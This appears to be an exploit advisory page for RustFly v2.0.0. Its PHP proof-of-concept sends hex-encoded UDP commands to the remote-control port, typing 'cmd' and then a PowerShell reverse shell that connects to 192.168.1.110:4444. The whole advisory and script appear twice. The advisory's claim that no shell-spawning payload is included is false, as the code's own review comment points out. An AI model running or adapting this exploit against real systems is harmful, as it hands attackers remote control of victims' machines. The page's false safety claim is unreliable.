Description
The remote UI control mechanism of RustFly accepts raw hex-encoded instructions over UDP. Some sequences trigger execution of remote system-level operations. Improper sanitization allows command-level injection. Version 2.0.0 is affected...
Basic Information
ID
PACKETSTORM:215819
Published
Feb 18, 2026 at 00:00
Affected Product
Affected Versions
=============================================================================================================================================
| # Title : RustFly v2.0.0 - Event Manipulation |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) |
| # Vendor : https://bixat.dev/products/rustfly |
=============================================================================================================================================
[+] Summary : The remote UI control mechanism of RustFly accepts raw hex-encoded instructions over UDP. Some sequences trigger execution of remote
system-level operations. Improper sanitization allows command-level injection.
Steps To Reproduce:
-------------------
1) Configure IP and port of RustFly target.
2) Run this PHP PoC sender script.
3) Observe behavior change / message processing by RustFly.
=========================================================
PoC Impact:
-----------
* Proof of input injection capability
* Demonstrates command-carrier transport
* No shell-spawning payloads included (safe demonstration)
=========================================================
Instructions:
-------------
Save file as:
poc.php
Run:
php poc.php
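<?php
// PoC sender for the RustFly v2.0.0 remote-control issue described in the advisory text.
//
// How it works: every entry in $messages is kept as a hex string in this file, decoded
// with hex2bin() and sent as one UDP datagram. The bytes on the wire are therefore the
// plain ASCII commands shown in the trailing comments (move:, double_click, text:, key:).
// The script sends nothing besides that command text: no credential, token or sequence
// number accompanies any datagram.
//
// NOTE(review): the advisory lists "No shell-spawning payloads included (safe
// demonstration)", but entry 5 below is a PowerShell reverse shell and, judging by the
// command names, entries 3-4 type `cmd` and press Enter first. Read the impact section
// with that in mind.
//
// Defender view: the observable pieces are UDP datagrams carrying these ASCII verbs to
// the control port (5005 in this script) from an unexpected host, and, on the target,
// a PowerShell process started with `-nop -c` and `System.Net.Sockets.TCPClient` on its
// command line followed by an outbound TCP connection. Limiting which hosts can reach
// the UDP listener and filtering workstation egress address the two stages.

$target_ip = "192.168.1.107";
$target_port = 5005;

// Position of the reverse-shell entry in $messages. Named once so the preview below and
// the per-message warning in the send loop stay in step if the list is edited.
$payload_index = 4;

$messages = [
    "6D6F76653A2D35352C31303530", // move:-55,1050
    "646F75626C655F636C69636B", // double_click
    "746578743A636D64", // text:cmd
    "6B65793A656E746572", // key:enter
    // Warning: This is a PowerShell command to create a reverse shell - potentially harmful use
    "746578743A706F7765727368656C6C202D6E6F70202D63202224633D4E65772D4F626A6563742053797374656D2E4E65742E536F636B6574732E544350436C69656E7428273139322E3136382E312E313130272C34343434293B24733D24632E47657453747265616D28293B5B627974655B5D5D24623D302E2E36353533357C257B307D3B7768696C65282824693D24732E526561642824622C302C24622E4C656E6774682929202D6E652030297B3B24643D284E65772D4F626A656374202D547970654E616D652053797374656D2E546578742E4153434949456E636F64696E67292E476574537472696E672824622C302C2469293B24723D69657820246420323E26313B24732E577269746528284E65772D4F626A656374202D547970654E616D652053797374656D2E546578742E4153434949456E636F64696E67292E4765744279746573282472202B20275053203E2027292C302C282472202B20275053203E2027292E4C656E677468297D22",
    "6B65793A656E746572", // key:enter
];

$dangerous_powershell = hex2bin($messages[$payload_index]);
if ($dangerous_powershell === false) {
    echo "[-] Invalid hex string: " . $messages[$payload_index] . "\n";
    exit(1);
}
echo "=== Warning: Analyzing Dangerous Content ===\n";
echo "The PowerShell command encoded in hex is:\n";
echo $dangerous_powershell . "\n\n";

// Derived from the decoded entry (minus its "text:" verb) instead of a second hand-typed
// copy, so the text shown to the operator is always exactly what would be sent.
$decoded_ps = substr($dangerous_powershell, strlen("text:"));
echo "=== Security Warning ===\n";
echo "This code contains a dangerous PowerShell command:\n";
echo "--------------------------------------------------\n";
echo $decoded_ps . "\n";
echo "--------------------------------------------------\n\n";
// The address and port in the lines below are hand-copied from the payload above.
echo "This command does:\n";
echo "1. Creates TCP connection to 192.168.1.110 on port 4444\n";
echo "2. Establishes a reverse shell (backdoor connection)\n";
echo "3. Executes any commands sent by the attacker\n";
echo "4. Returns results to the attacker\n\n";

// Operator confirmation gate. Anything other than an explicit "yes", including a closed
// or unreadable stdin, cancels the run before any socket is opened.
echo "Do you want to continue? (yes/no): ";
$handle = fopen("php://stdin", "r");
$line = ($handle === false) ? false : fgets($handle);
if ($handle !== false) {
    fclose($handle);
}
if ($line === false || trim(strtolower($line)) !== 'yes') {
    echo "Operation cancelled.\n";
    exit(0);
}
echo "Continuing...\n\n";

$sock = socket_create(AF_INET, SOCK_DGRAM, SOL_UDP);
if ($sock === false) {
    echo "[-] Failed to create socket: " . socket_strerror(socket_last_error()) . "\n";
    exit(1);
}
if (!socket_bind($sock, "0.0.0.0", 0)) {
    // Ask for this socket's own error rather than the process-wide last error.
    echo "[-] Failed to bind socket: " . socket_strerror(socket_last_error($sock)) . "\n";
    socket_close($sock);
    exit(1);
}
// No reply is read anywhere below, so this receive timeout does not affect the run;
// it is kept as published.
socket_set_option($sock, SOL_SOCKET, SO_RCVTIMEO, ["sec" => 5, "usec" => 0]);

$failed = 0;           // entries that were not sent (bad hex or sendto failure)
$payload_sent = false; // whether the reverse-shell entry actually left this host
try {
    foreach ($messages as $index => $msg) {
        $binary_msg = hex2bin($msg);
        if ($binary_msg === false) {
            echo "[-] Invalid hex string: $msg\n";
            $failed++;
            continue;
        }
        $sent = socket_sendto($sock, $binary_msg, strlen($binary_msg), 0, $target_ip, $target_port);
        if ($sent === false) {
            echo "[-] Failed to send data: " . socket_strerror(socket_last_error($sock)) . "\n";
            $failed++;
        } else {
            // Strip non-printable bytes before echoing the datagram to the terminal.
            $display_msg = preg_replace('/[^\x20-\x7E]/', '', $binary_msg);
            echo "[+] Message " . ($index + 1) . " sent: $display_msg\n";
            if ($index === $payload_index) {
                echo " Warning: Malicious PowerShell command sent!\n";
                $payload_sent = true;
            }
        }
        // One-second gap between datagrams, as in the published script.
        sleep(1);
    }
    // Report what actually happened instead of claiming success unconditionally.
    if ($failed === 0) {
        echo "\n[+] All messages sent successfully.\n";
    } else {
        echo "\n[-] $failed of " . count($messages) . " messages were not sent.\n";
    }
    if ($payload_sent) {
        echo " Warning: If executed, the target machine will connect to 192.168.1.110:4444\n";
    }
} catch (Exception $e) {
    echo "[-] Exception: " . $e->getMessage() . "\n";
}
finally {
    socket_close($sock);
    echo "[*] Socket closed.\n";
}
?>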
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================
| # Title : RustFly v2.0.0 - Event Manipulation |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) |
| # Vendor : https://bixat.dev/products/rustfly |
=============================================================================================================================================
[+] Summary : The remote UI control mechanism of RustFly accepts raw hex-encoded instructions over UDP. Some sequences trigger execution of remote
system-level operations. Improper sanitization allows command-level injection.
Steps To Reproduce:
-------------------
1) Configure IP and port of RustFly target.
2) Run this PHP PoC sender script.
3) Observe behavior change / message processing by RustFly.
=========================================================
PoC Impact:
-----------
* Proof of input injection capability
* Demonstrates command-carrier transport
* No shell-spawning payloads included (safe demonstration)
=========================================================
Instructions:
-------------
Save file as:
poc.php
Run:
php poc.php
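<?php
// PoC sender for the RustFly v2.0.0 remote-control issue described in the advisory text.
//
// How it works: every entry in $messages is kept as a hex string in this file, decoded
// with hex2bin() and sent as one UDP datagram. The bytes on the wire are therefore the
// plain ASCII commands shown in the trailing comments (move:, double_click, text:, key:).
// The script sends nothing besides that command text: no credential, token or sequence
// number accompanies any datagram.
//
// NOTE(review): the advisory lists "No shell-spawning payloads included (safe
// demonstration)", but entry 5 below is a PowerShell reverse shell and, judging by the
// command names, entries 3-4 type `cmd` and press Enter first. Read the impact section
// with that in mind.
//
// Defender view: the observable pieces are UDP datagrams carrying these ASCII verbs to
// the control port (5005 in this script) from an unexpected host, and, on the target,
// a PowerShell process started with `-nop -c` and `System.Net.Sockets.TCPClient` on its
// command line followed by an outbound TCP connection. Limiting which hosts can reach
// the UDP listener and filtering workstation egress address the two stages.

$target_ip = "192.168.1.107";
$target_port = 5005;

// Position of the reverse-shell entry in $messages. Named once so the preview below and
// the per-message warning in the send loop stay in step if the list is edited.
$payload_index = 4;

$messages = [
    "6D6F76653A2D35352C31303530", // move:-55,1050
    "646F75626C655F636C69636B", // double_click
    "746578743A636D64", // text:cmd
    "6B65793A656E746572", // key:enter
    // Warning: This is a PowerShell command to create a reverse shell - potentially harmful use
    "746578743A706F7765727368656C6C202D6E6F70202D63202224633D4E65772D4F626A6563742053797374656D2E4E65742E536F636B6574732E544350436C69656E7428273139322E3136382E312E313130272C34343434293B24733D24632E47657453747265616D28293B5B627974655B5D5D24623D302E2E36353533357C257B307D3B7768696C65282824693D24732E526561642824622C302C24622E4C656E6774682929202D6E652030297B3B24643D284E65772D4F626A656374202D547970654E616D652053797374656D2E546578742E4153434949456E636F64696E67292E476574537472696E672824622C302C2469293B24723D69657820246420323E26313B24732E577269746528284E65772D4F626A656374202D547970654E616D652053797374656D2E546578742E4153434949456E636F64696E67292E4765744279746573282472202B20275053203E2027292C302C282472202B20275053203E2027292E4C656E677468297D22",
    "6B65793A656E746572", // key:enter
];

$dangerous_powershell = hex2bin($messages[$payload_index]);
if ($dangerous_powershell === false) {
    echo "[-] Invalid hex string: " . $messages[$payload_index] . "\n";
    exit(1);
}
echo "=== Warning: Analyzing Dangerous Content ===\n";
echo "The PowerShell command encoded in hex is:\n";
echo $dangerous_powershell . "\n\n";

// Derived from the decoded entry (minus its "text:" verb) instead of a second hand-typed
// copy, so the text shown to the operator is always exactly what would be sent.
$decoded_ps = substr($dangerous_powershell, strlen("text:"));
echo "=== Security Warning ===\n";
echo "This code contains a dangerous PowerShell command:\n";
echo "--------------------------------------------------\n";
echo $decoded_ps . "\n";
echo "--------------------------------------------------\n\n";
// The address and port in the lines below are hand-copied from the payload above.
echo "This command does:\n";
echo "1. Creates TCP connection to 192.168.1.110 on port 4444\n";
echo "2. Establishes a reverse shell (backdoor connection)\n";
echo "3. Executes any commands sent by the attacker\n";
echo "4. Returns results to the attacker\n\n";

// Operator confirmation gate. Anything other than an explicit "yes", including a closed
// or unreadable stdin, cancels the run before any socket is opened.
echo "Do you want to continue? (yes/no): ";
$handle = fopen("php://stdin", "r");
$line = ($handle === false) ? false : fgets($handle);
if ($handle !== false) {
    fclose($handle);
}
if ($line === false || trim(strtolower($line)) !== 'yes') {
    echo "Operation cancelled.\n";
    exit(0);
}
echo "Continuing...\n\n";

$sock = socket_create(AF_INET, SOCK_DGRAM, SOL_UDP);
if ($sock === false) {
    echo "[-] Failed to create socket: " . socket_strerror(socket_last_error()) . "\n";
    exit(1);
}
if (!socket_bind($sock, "0.0.0.0", 0)) {
    // Ask for this socket's own error rather than the process-wide last error.
    echo "[-] Failed to bind socket: " . socket_strerror(socket_last_error($sock)) . "\n";
    socket_close($sock);
    exit(1);
}
// No reply is read anywhere below, so this receive timeout does not affect the run;
// it is kept as published.
socket_set_option($sock, SOL_SOCKET, SO_RCVTIMEO, ["sec" => 5, "usec" => 0]);

$failed = 0;           // entries that were not sent (bad hex or sendto failure)
$payload_sent = false; // whether the reverse-shell entry actually left this host
try {
    foreach ($messages as $index => $msg) {
        $binary_msg = hex2bin($msg);
        if ($binary_msg === false) {
            echo "[-] Invalid hex string: $msg\n";
            $failed++;
            continue;
        }
        $sent = socket_sendto($sock, $binary_msg, strlen($binary_msg), 0, $target_ip, $target_port);
        if ($sent === false) {
            echo "[-] Failed to send data: " . socket_strerror(socket_last_error($sock)) . "\n";
            $failed++;
        } else {
            // Strip non-printable bytes before echoing the datagram to the terminal.
            $display_msg = preg_replace('/[^\x20-\x7E]/', '', $binary_msg);
            echo "[+] Message " . ($index + 1) . " sent: $display_msg\n";
            if ($index === $payload_index) {
                echo " Warning: Malicious PowerShell command sent!\n";
                $payload_sent = true;
            }
        }
        // One-second gap between datagrams, as in the published script.
        sleep(1);
    }
    // Report what actually happened instead of claiming success unconditionally.
    if ($failed === 0) {
        echo "\n[+] All messages sent successfully.\n";
    } else {
        echo "\n[-] $failed of " . count($messages) . " messages were not sent.\n";
    }
    if ($payload_sent) {
        echo " Warning: If executed, the target machine will connect to 192.168.1.110:4444\n";
    }
} catch (Exception $e) {
    echo "[-] Exception: " . $e->getMessage() . "\n";
}
finally {
    socket_close($sock);
    echo "[*] Socket closed.\n";
}
?>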
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================